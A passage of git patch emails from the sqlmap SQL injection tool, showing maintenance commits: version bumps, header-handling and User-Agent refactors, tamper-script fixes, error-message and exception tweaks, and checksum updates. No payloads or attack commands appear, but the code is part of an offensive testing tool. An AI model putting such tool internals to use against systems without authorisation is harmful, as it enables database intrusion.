HTTP_HEADER.USER_AGENT.upper(): _ = False break diff --git a/lib/core/settings.py b/lib/core/settings.py index 7f1caee5c37..af0dd39dace 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.11.16" +VERSION = "1.2.11.17" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/target.py b/lib/core/target.py index 2a6926816f3..a89c0c89143 100644 --- a/lib/core/target.py +++ b/lib/core/target.py @@ -346,7 +346,7 @@ def process(match, repl): # Url encoding of the header values should be avoided # Reference: http://stackoverflow.com/questions/5085904/is-ok-to-urlencode-the-value-in-headerlocation-value - if httpHeader.title() == HTTP_HEADER.USER_AGENT: + if httpHeader.upper() == HTTP_HEADER.USER_AGENT.upper(): conf.parameters[PLACE.USER_AGENT] = urldecode(headerValue) condition = any((not conf.testParameter, intersect(conf.testParameter, USER_AGENT_ALIASES, True))) @@ -355,7 +355,7 @@ def process(match, repl): conf.paramDict[PLACE.USER_AGENT] = {PLACE.USER_AGENT: headerValue} testableParameters = True - elif httpHeader.title() == HTTP_HEADER.REFERER: + elif httpHeader.upper() == HTTP_HEADER.REFERER.upper(): conf.parameters[PLACE.REFERER] = urldecode(headerValue) condition = any((not conf.testParameter, intersect(conf.testParameter, REFERER_ALIASES, True))) @@ -364,7 +364,7 @@ def process(match, repl): conf.paramDict[PLACE.REFERER] = {PLACE.REFERER: headerValue} testableParameters = True - elif httpHeader.title() == HTTP_HEADER.HOST: + elif httpHeader.upper() == HTTP_HEADER.HOST.upper(): conf.parameters[PLACE.HOST] = urldecode(headerValue) condition = any((not conf.testParameter, intersect(conf.testParameter, HOST_ALIASES, True))) diff --git a/lib/request/connect.py b/lib/request/connect.py index c3526fd3f06..056baa71645 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -866,10 +866,10 @@ def queryPage(value=None, place=None, content=False, getRatioValue=False, silent value = agent.replacePayload(value, payload) else: # GET, POST, URI and Cookie payload needs to be thoroughly URL encoded - if (place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) or place == PLACE.CUSTOM_HEADER and value.split(',')[0] == HTTP_HEADER.COOKIE) and not conf.skipUrlEncode or place in (PLACE.POST, PLACE.CUSTOM_POST) and postUrlEncode: + if (place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) or place == PLACE.CUSTOM_HEADER and value.split(',')[0].upper() == HTTP_HEADER.COOKIE.upper()) and not conf.skipUrlEncode or place in (PLACE.POST, PLACE.CUSTOM_POST) and postUrlEncode: skip = False - if place == PLACE.COOKIE or place == PLACE.CUSTOM_HEADER and value.split(',')[0] == HTTP_HEADER.COOKIE: + if place == PLACE.COOKIE or place == PLACE.CUSTOM_HEADER and value.split(',')[0].upper() == HTTP_HEADER.COOKIE.upper(): if kb.cookieEncodeChoice is None: msg = "do you want to URL encode cookie values (implementation specific)? %s" % ("[Y/n]" if not conf.url.endswith(".aspx") else "[y/N]") # Reference: https://support.microsoft.com/en-us/kb/313282 kb.cookieEncodeChoice = readInput(msg, default='Y' if not conf.url.endswith(".aspx") else 'N', boolean=True) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index b1cb919bba8..a24e0c0860a 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -42,17 +42,17 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 7d6edc552e08c30f4f4d49fa93b746f1 lib/core/optiondict.py -d6dace6468ed5d2bbd500b0a244a9650 lib/core/option.py +c6a8223fbc1dad784d4ae6377e737a97 lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -342e732d0772891804c7609578176997 lib/core/settings.py +3f8cf314028234cb8c60c66a915da2e2 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py -721198b5be72c8015a02acb116532a1f lib/core/target.py +52642badbbca4c31a2fcdd754d67a983 lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py cd0067d1798e45f422ce44b98baf57db lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py @@ -71,7 +71,7 @@ f6b5957bf2103c3999891e4f45180bce lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py -d21e3452240ae3e59dfeb05fabc9ea14 lib/request/connect.py +0113525b321d0d35cf973a9cff34850a lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py From 1d0d5f1675f67a43d1fbdd10984a84f4c1465081 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 28 Nov 2018 23:09:13 +0100 Subject: [PATCH 368/428] Fixes #3389 --- lib/core/common.py | 5 +++++ lib/core/option.py | 1 + lib/core/settings.py | 2 +- txt/checksum.md5 | 6 +++--- 4 files changed, 10 insertions(+), 4 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 8da52c896d9..75e3db096c0 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -997,6 +997,11 @@ def readInput(message, default=None, checkBatch=True, boolean=False): retVal = None kb.stickyLevel = None + if kb.lastInputMessage == message: + checkBatch = False + else: + kb.lastInputMessage = message + message = getUnicode(message) if "\n" in message: diff --git a/lib/core/option.py b/lib/core/option.py index 288213acfcc..a55a9a8bb25 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1795,6 +1795,7 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.injection = InjectionDict() kb.injections = [] kb.laggingChecked = False + kb.lastInputMessage = None kb.lastParserStatus = None kb.locks = AttribDict() diff --git a/lib/core/settings.py b/lib/core/settings.py index af0dd39dace..5b532aea1ae 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.11.17" +VERSION = "1.2.11.18" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index a24e0c0860a..10f852c8d91 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -29,7 +29,7 @@ dd42ef140ffc0bd517128e6df369ab01 lib/controller/controller.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py cb865cf6eff60118bc97a0f106af5e4d lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py -eb4e54c194d50d9dc8caa1a3ea69cba6 lib/core/common.py +9ed51d3e770b5cec2f8c91e962011d52 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -42,14 +42,14 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 7d6edc552e08c30f4f4d49fa93b746f1 lib/core/optiondict.py -c6a8223fbc1dad784d4ae6377e737a97 lib/core/option.py +a24992df012aee6d5617808f1dbb70ec lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -3f8cf314028234cb8c60c66a915da2e2 lib/core/settings.py +c0d7976aabdffc78b22a9e63f3a51683 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 52642badbbca4c31a2fcdd754d67a983 lib/core/target.py From 560ff4154b88893a6a36b415c4ed877944723309 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 29 Nov 2018 00:09:05 +0100 Subject: [PATCH 369/428] Fixes #3388 (and refactors #1578) --- lib/controller/controller.py | 1 + lib/core/option.py | 17 ++++------------- lib/core/settings.py | 3 ++- lib/request/connect.py | 24 ++++++++++++++---------- txt/checksum.md5 | 8 ++++---- 5 files changed, 25 insertions(+), 28 deletions(-) diff --git a/lib/controller/controller.py b/lib/controller/controller.py index c63d7862a6b..9cdc3534d1c 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -313,6 +313,7 @@ def start(): conf.cookie = targetCookie conf.httpHeaders = list(initialHeaders) conf.httpHeaders.extend(targetHeaders or []) + conf.httpHeaders = [conf.httpHeaders[i] for i in xrange(len(conf.httpHeaders)) if conf.httpHeaders[i][0].upper() not in (__[0].upper() for __ in conf.httpHeaders[i + 1:])] initTargetEnv() parseTargetUrl() diff --git a/lib/core/option.py b/lib/core/option.py index a55a9a8bb25..95fd7e7cbdc 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -102,6 +102,7 @@ from lib.core.settings import DEFAULT_PAGE_ENCODING from lib.core.settings import DEFAULT_TOR_HTTP_PORTS from lib.core.settings import DEFAULT_TOR_SOCKS_PORTS +from lib.core.settings import DEFAULT_USER_AGENT from lib.core.settings import DUMMY_URL from lib.core.settings import IS_WIN from lib.core.settings import KB_CHARS_BOUNDARY_CHAR @@ -112,7 +113,6 @@ from lib.core.settings import NULL from lib.core.settings import PARAMETER_SPLITTING_REGEX from lib.core.settings import PRECONNECT_CANDIDATE_TIMEOUT -from lib.core.settings import SITE from lib.core.settings import SOCKET_PRE_CONNECT_QUEUE_SIZE from lib.core.settings import SQLMAP_ENVIRONMENT_PREFIX from lib.core.settings import SUPPORTED_DBMS @@ -122,7 +122,6 @@ from lib.core.settings import UNION_CHAR_REGEX from lib.core.settings import UNKNOWN_DBMS_VERSION from lib.core.settings import URI_INJECTABLE_REGEX -from lib.core.settings import VERSION_STRING from lib.core.threads import getCurrentThreadData from lib.core.threads import setDaemon from lib.core.update import update @@ -1256,14 +1255,6 @@ def _setHTTPExtraHeaders(): # Reference: http://stackoverflow.com/a/1383359 conf.httpHeaders.append((HTTP_HEADER.CACHE_CONTROL, "no-cache")) -def _defaultHTTPUserAgent(): - """ - @return: default sqlmap HTTP User-Agent header - @rtype: C{str} - """ - - return "%s (%s)" % (VERSION_STRING, SITE) - def _setHTTPUserAgent(): """ Set the HTTP User-Agent header. @@ -1308,7 +1299,7 @@ def _setHTTPUserAgent(): break if _: - conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, _defaultHTTPUserAgent())) + conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, DEFAULT_USER_AGENT)) else: if not kb.userAgents: @@ -1323,10 +1314,10 @@ def _setHTTPUserAgent(): warnMsg += "file '%s'" % paths.USER_AGENTS logger.warn(warnMsg) - conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, _defaultHTTPUserAgent())) + conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, DEFAULT_USER_AGENT)) return - userAgent = random.sample(kb.userAgents or [_defaultHTTPUserAgent()], 1)[0] + userAgent = random.sample(kb.userAgents or [DEFAULT_USER_AGENT], 1)[0] infoMsg = "fetched random HTTP User-Agent header value '%s' from " % userAgent infoMsg += "file '%s'" % paths.USER_AGENTS diff --git a/lib/core/settings.py b/lib/core/settings.py index 5b532aea1ae..3ec3feaf467 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,12 +19,13 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.11.18" +VERSION = "1.2.11.19" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) DESCRIPTION = "automatic SQL injection and database takeover tool" SITE = "http://sqlmap.org" +DEFAULT_USER_AGENT = "%s (%s)" % (VERSION_STRING, SITE) DEV_EMAIL_ADDRESS = "dev@sqlmap.org" ISSUES_PAGE = "https://github.com/sqlmapproject/sqlmap/issues/new" GIT_REPOSITORY = "https://github.com/sqlmapproject/sqlmap.git" diff --git a/lib/request/connect.py b/lib/request/connect.py index 056baa71645..8d46dbc7f6e 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -89,6 +89,7 @@ class WebSocketException(Exception): from lib.core.settings import DEFAULT_CONTENT_TYPE from lib.core.settings import DEFAULT_COOKIE_DELIMITER from lib.core.settings import DEFAULT_GET_POST_DELIMITER +from lib.core.settings import DEFAULT_USER_AGENT from lib.core.settings import EVALCODE_KEYWORD_SUFFIX from lib.core.settings import HTTP_ACCEPT_HEADER_VALUE from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE @@ -361,14 +362,21 @@ def getPage(**kwargs): if kb.proxyAuthHeader: headers[HTTP_HEADER.PROXY_AUTHORIZATION] = kb.proxyAuthHeader - if not getHeader(headers, HTTP_HEADER.ACCEPT): - headers[HTTP_HEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE + if not conf.requestFile or not target: + if not getHeader(headers, HTTP_HEADER.HOST): + headers[HTTP_HEADER.HOST] = getHostHeader(url) - if not getHeader(headers, HTTP_HEADER.HOST) or not target: - headers[HTTP_HEADER.HOST] = getHostHeader(url) + if not getHeader(headers, HTTP_HEADER.ACCEPT): + headers[HTTP_HEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE - if not getHeader(headers, HTTP_HEADER.ACCEPT_ENCODING): - headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if kb.pageCompress else "identity" + if not getHeader(headers, HTTP_HEADER.ACCEPT_ENCODING): + headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if kb.pageCompress else "identity" + + elif conf.requestFile and getHeader(headers, HTTP_HEADER.USER_AGENT) == DEFAULT_USER_AGENT: + for header in headers: + if header.upper() == HTTP_HEADER.USER_AGENT.upper(): + del headers[header] + break if post is not None and not multipart and not getHeader(headers, HTTP_HEADER.CONTENT_TYPE): headers[HTTP_HEADER.CONTENT_TYPE] = POST_HINT_CONTENT_TYPES.get(kb.postHint, DEFAULT_CONTENT_TYPE) @@ -385,10 +393,6 @@ def getPage(**kwargs): if conf.keepAlive: headers[HTTP_HEADER.CONNECTION] = "keep-alive" - # Reset header values to original in case of provided request file - if target and conf.requestFile: - headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie}) - if auxHeaders: headers = forgeHeaders(auxHeaders, headers) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 10f852c8d91..b054da5c7ae 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -24,7 +24,7 @@ b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py 71334197c7ed28167cd66c17b2c21844 lib/controller/checks.py -dd42ef140ffc0bd517128e6df369ab01 lib/controller/controller.py +95cde6dc7efe2581a5936f0d4635cb3b lib/controller/controller.py 988b548f6578adf9cec17afdeee8291c lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py cb865cf6eff60118bc97a0f106af5e4d lib/core/agent.py @@ -42,14 +42,14 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 7d6edc552e08c30f4f4d49fa93b746f1 lib/core/optiondict.py -a24992df012aee6d5617808f1dbb70ec lib/core/option.py +7dacc178910ab4d57de36c3602bde17d lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -c0d7976aabdffc78b22a9e63f3a51683 lib/core/settings.py +9f209388d9fed41480e57c8574d0111a lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 52642badbbca4c31a2fcdd754d67a983 lib/core/target.py @@ -71,7 +71,7 @@ f6b5957bf2103c3999891e4f45180bce lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py -0113525b321d0d35cf973a9cff34850a lib/request/connect.py +77b24c30b1a2163add76652998e74127 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py From e7ed2bbcbba0bbde42ddcf373cf5048b8ad1d19e Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 30 Nov 2018 11:29:17 +0100 Subject: [PATCH 370/428] Fixes #3391) --- tamper/plus2concat.py | 5 +++++ tamper/plus2fnconcat.py | 5 +++++ 2 files changed, 10 insertions(+) diff --git a/tamper/plus2concat.py b/tamper/plus2concat.py index 574a2082850..113315b9b3c 100644 --- a/tamper/plus2concat.py +++ b/tamper/plus2concat.py @@ -41,6 +41,9 @@ def tamper(payload, **kwargs): retVal = payload if payload: + prefix, suffix = '+' * len(re.search(r"\A(\+*)", payload).group(0)), '+' * len(re.search(r"(\+*)\Z", payload).group(0)) + retVal = retVal.strip('+') + while True: indexes = zeroDepthSearch(retVal, '+') @@ -76,4 +79,6 @@ def tamper(payload, **kwargs): else: break + retVal = "%s%s%s" % (prefix, retVal, suffix) + return retVal diff --git a/tamper/plus2fnconcat.py b/tamper/plus2fnconcat.py index 86ceee621ca..bc85826f8ff 100644 --- a/tamper/plus2fnconcat.py +++ b/tamper/plus2fnconcat.py @@ -42,6 +42,9 @@ def tamper(payload, **kwargs): retVal = payload if payload: + prefix, suffix = '+' * len(re.search(r"\A(\+*)", payload).group(0)), '+' * len(re.search(r"(\+*)\Z", payload).group(0)) + retVal = retVal.strip('+') + while True: indexes = zeroDepthSearch(retVal, '+') @@ -89,4 +92,6 @@ def tamper(payload, **kwargs): else: break + retVal = "%s%s%s" % (prefix, retVal, suffix) + return retVal From 0ce2128a9b9c1a0d6a753fa5d16ad18d70062390 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 3 Dec 2018 22:40:44 +0100 Subject: [PATCH 371/428] Fixes #3394 --- lib/core/agent.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/core/agent.py b/lib/core/agent.py index 48bf658a1bd..f95e92dddeb 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -920,7 +920,7 @@ def limitQuery(self, num, query, field=None, uniqueField=None): elif Backend.isDbms(DBMS.HSQLDB): match = re.search(r"ORDER BY [^ ]+", limitedQuery) if match: - limitedQuery = re.sub(r"\s*%s\s*" % match.group(0), " ", limitedQuery).strip() + limitedQuery = re.sub(r"\s*%s\s*" % re.escape(match.group(0)), " ", limitedQuery).strip() limitedQuery += " %s" % match.group(0) if query.startswith("SELECT "): From 536d9a597ecad4a7a300ac92126b229d9ad834fb Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 3 Dec 2018 22:59:46 +0100 Subject: [PATCH 372/428] Minor language update --- lib/techniques/error/use.py | 2 +- lib/techniques/union/use.py | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py index 08399cca49b..773824250d2 100644 --- a/lib/techniques/error/use.py +++ b/lib/techniques/error/use.py @@ -332,7 +332,7 @@ def errorUse(expression, dump=False): stopLimit = int(count) infoMsg = "used SQL query returns " - infoMsg += "%d entries" % stopLimit + infoMsg += "%d %s" % (stopLimit, "entries" if stopLimit > 1 else "entry") logger.info(infoMsg) elif count and not count.isdigit(): diff --git a/lib/techniques/union/use.py b/lib/techniques/union/use.py index 795443b86e7..7e68fb2d01b 100644 --- a/lib/techniques/union/use.py +++ b/lib/techniques/union/use.py @@ -258,7 +258,7 @@ def unionUse(expression, unpack=True, dump=False): stopLimit = int(count) infoMsg = "used SQL query returns " - infoMsg += "%d entries" % stopLimit + infoMsg += "%d %s" % (stopLimit, "entries" if stopLimit > 1 else "entry") logger.info(infoMsg) elif count and (not isinstance(count, basestring) or not count.isdigit()): From 65f227fe6534eef78baa81f1c90ceadd442b261c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 3 Dec 2018 23:07:13 +0100 Subject: [PATCH 373/428] Bug fix (privately reported: --technique=E --where='id=1') --- lib/techniques/error/use.py | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py index 773824250d2..76f2e84b412 100644 --- a/lib/techniques/error/use.py +++ b/lib/techniques/error/use.py @@ -444,8 +444,11 @@ def errorThread(): if not value and not abortedFlag: value = _errorFields(expression, expressionFields, expressionFieldsList) - if value and isListLike(value) and len(value) == 1 and isinstance(value[0], basestring): - value = unArrayizeValue(value) + if value and isListLike(value): + if len(value) == 1 and isinstance(value[0], basestring): + value = unArrayizeValue(value) + elif len(value) > 1 and stopLimit == 1: + value = [value] duration = calculateDeltaSeconds(start) From 843126702da64e36ca5046b9db28b59dfa97e94d Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 3 Dec 2018 23:12:45 +0100 Subject: [PATCH 374/428] Fixes #3392 --- lib/controller/checks.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 69e03c5cd34..aee960b6282 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -1530,7 +1530,7 @@ def checkConnection(suppressOutput=False): except socket.gaierror: errMsg = "host '%s' does not exist" % conf.hostname raise SqlmapConnectionException(errMsg) - except socket.error, ex: + except (socket.error, UnicodeError), ex: errMsg = "problem occurred while " errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, getSafeExString(ex)) raise SqlmapConnectionException(errMsg) From 101d1f0d497dd435cbf6165a966801d69745f228 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 3 Dec 2018 23:18:52 +0100 Subject: [PATCH 375/428] Fixes #3395 --- lib/controller/checks.py | 7 ++++++- lib/core/option.py | 8 +++++++- 2 files changed, 13 insertions(+), 2 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index aee960b6282..104aeec9e52 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -70,6 +70,7 @@ from lib.core.enums import PLACE from lib.core.enums import REDIRECTION from lib.core.exception import SqlmapConnectionException +from lib.core.exception import SqlmapDataException from lib.core.exception import SqlmapNoneDataException from lib.core.exception import SqlmapSilentQuitException from lib.core.exception import SqlmapSkipTargetException @@ -1530,10 +1531,14 @@ def checkConnection(suppressOutput=False): except socket.gaierror: errMsg = "host '%s' does not exist" % conf.hostname raise SqlmapConnectionException(errMsg) - except (socket.error, UnicodeError), ex: + except socket.error, ex: errMsg = "problem occurred while " errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, getSafeExString(ex)) raise SqlmapConnectionException(errMsg) + except UnicodeError, ex: + errMsg = "problem occurred while " + errMsg += "handling a host name '%s' ('%s')" % (conf.hostname, getSafeExString(ex)) + raise SqlmapDataException(errMsg) if not suppressOutput and not conf.dummy and not conf.offline: infoMsg = "testing connection to the target URL" diff --git a/lib/core/option.py b/lib/core/option.py index 95fd7e7cbdc..8081e34626c 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -82,6 +82,7 @@ from lib.core.enums import REFLECTIVE_COUNTER from lib.core.enums import WIZARD from lib.core.exception import SqlmapConnectionException +from lib.core.exception import SqlmapDataException from lib.core.exception import SqlmapFilePathException from lib.core.exception import SqlmapGenericException from lib.core.exception import SqlmapInstallationException @@ -1364,7 +1365,12 @@ def _setHostname(): """ if conf.url: - conf.hostname = urlparse.urlsplit(conf.url).netloc.split(':')[0] + try: + conf.hostname = urlparse.urlsplit(conf.url).netloc.split(':')[0] + except ValueError, ex: + errMsg = "problem occurred while " + errMsg += "parsing an URL '%s' ('%s')" % (conf.url, getSafeExString(ex)) + raise SqlmapDataException(errMsg) def _setHTTPTimeout(): """ From 66d26f67bfa20c13a2d2e1a80fbe2b4a7900ecb7 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 7 Dec 2018 10:06:31 +0100 Subject: [PATCH 376/428] Manual tagging (automatic tagging failed for some reason) --- lib/core/settings.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 3ec3feaf467..e6136207bb4 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.11.19" +VERSION = "1.2.12.0" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) From f04584bb68b10cde7d0d3a82b5bf0395e6960ebf Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 7 Dec 2018 11:22:53 +0100 Subject: [PATCH 377/428] Update of error message regexes --- xml/errors.xml | 24 ++++++++++++++++++------ 1 file changed, 18 insertions(+), 6 deletions(-) diff --git a/xml/errors.xml b/xml/errors.xml index e8001c3b937..02e529e7f66 100644 --- a/xml/errors.xml +++ b/xml/errors.xml @@ -11,8 +11,8 @@ - + @@ -24,6 +24,9 @@ + + + @@ -36,13 +39,14 @@ - + - + + @@ -61,9 +65,10 @@ - + + @@ -72,12 +77,14 @@ + + @@ -86,6 +93,7 @@ + @@ -98,12 +106,16 @@ + + + + @@ -120,6 +132,7 @@ + @@ -130,14 +143,13 @@ - + - From 070e17306721baae2c0034f610061e147740ae28 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 10 Dec 2018 12:59:13 +0100 Subject: [PATCH 378/428] Another patch for #3389 (Fixes #3397) --- lib/core/common.py | 5 ----- lib/core/option.py | 1 - lib/takeover/metasploit.py | 15 ++------------- 3 files changed, 2 insertions(+), 19 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 75e3db096c0..8da52c896d9 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -997,11 +997,6 @@ def readInput(message, default=None, checkBatch=True, boolean=False): retVal = None kb.stickyLevel = None - if kb.lastInputMessage == message: - checkBatch = False - else: - kb.lastInputMessage = message - message = getUnicode(message) if "\n" in message: diff --git a/lib/core/option.py b/lib/core/option.py index 8081e34626c..499cefb0b0e 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1792,7 +1792,6 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.injection = InjectionDict() kb.injections = [] kb.laggingChecked = False - kb.lastInputMessage = None kb.lastParserStatus = None kb.locks = AttribDict() diff --git a/lib/takeover/metasploit.py b/lib/takeover/metasploit.py index 8a8c0b74d45..356eba16acf 100644 --- a/lib/takeover/metasploit.py +++ b/lib/takeover/metasploit.py @@ -168,19 +168,8 @@ def _skeletonSelection(self, msg, lst=None, maxValue=1, default=1): choice = readInput(message, default="%d" % default) - if not choice: - if lst: - choice = getUnicode(default, UNICODE_ENCODING) - else: - return default - - elif not choice.isdigit(): - logger.warn("invalid value, only digits are allowed") - return self._skeletonSelection(msg, lst, maxValue, default) - - elif int(choice) > maxValue or int(choice) < 1: - logger.warn("invalid value, it must be a digit between 1 and %d" % maxValue) - return self._skeletonSelection(msg, lst, maxValue, default) + if not choice or not choice.isdigit() or int(choice) > maxValue or int(choice) < 1: + choice = default choice = int(choice) From 4f1b0787ed70deba6b3f76bf28adf3a7393b8cfa Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 10 Dec 2018 13:04:53 +0100 Subject: 